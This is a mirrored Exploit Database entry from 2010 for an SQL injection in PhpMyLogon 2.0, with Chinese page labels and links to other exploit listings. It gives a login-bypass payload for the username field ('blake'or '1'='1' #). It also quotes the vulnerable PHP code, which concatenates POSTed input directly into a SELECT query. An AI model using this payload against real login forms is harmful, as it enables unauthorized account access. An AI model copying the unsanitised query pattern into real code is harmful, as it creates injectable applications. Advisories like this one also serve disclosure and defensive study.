PhpMyLogon 2.0 – SQL Injection

Exploit Database
107 阅读

作者： blake

日期： 2010-03-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11737/

# Exploit Title: PhpMyLogon SQL Injection

# Date: March 14, 2010

# Author: Blake

# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download

# Version: 2

# Tested on: Windows XP SP3

Proof of Concept:

Enter the following for the username to login as the first user:

blake'or '1'='1' #

and anything for the password.

Vulnerable Code:

if(isset($_POST['submit'])) {

if($_POST['username'] != "" AND $_POST['password'] != "") {

// Check submitted data with data in database

$sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM <code>".$settings['db_table']."</code> WHERE username = '".$_POST['username']."' LIMIT 1";

$query = mysql_query($sql);

last Exploits
PhpMyLogon 2.0 – SQL Injection的更多信息

WordPress Plugin Finder – ‘order’ Cross-Site Scripting：
WEBMIS CMS – Arbitrary File Upload：
Adianti Framework 5.5.0 – SQL Injection：
Asset Manager 1.0 – Arbitrary File Upload：
WordPress Plugin oQey Headers 0.3 – SQL Injection：
Accela Civic Platform 21.1 – ‘successURL’ Cross-Site-Scripting (XSS)：
Expense Management System – ‘description’ Stored Cross Site Scripting：
Company’s Recruitment Management System 1.0 – ‘Multiple’ SQL Injection (Unauthenticated)：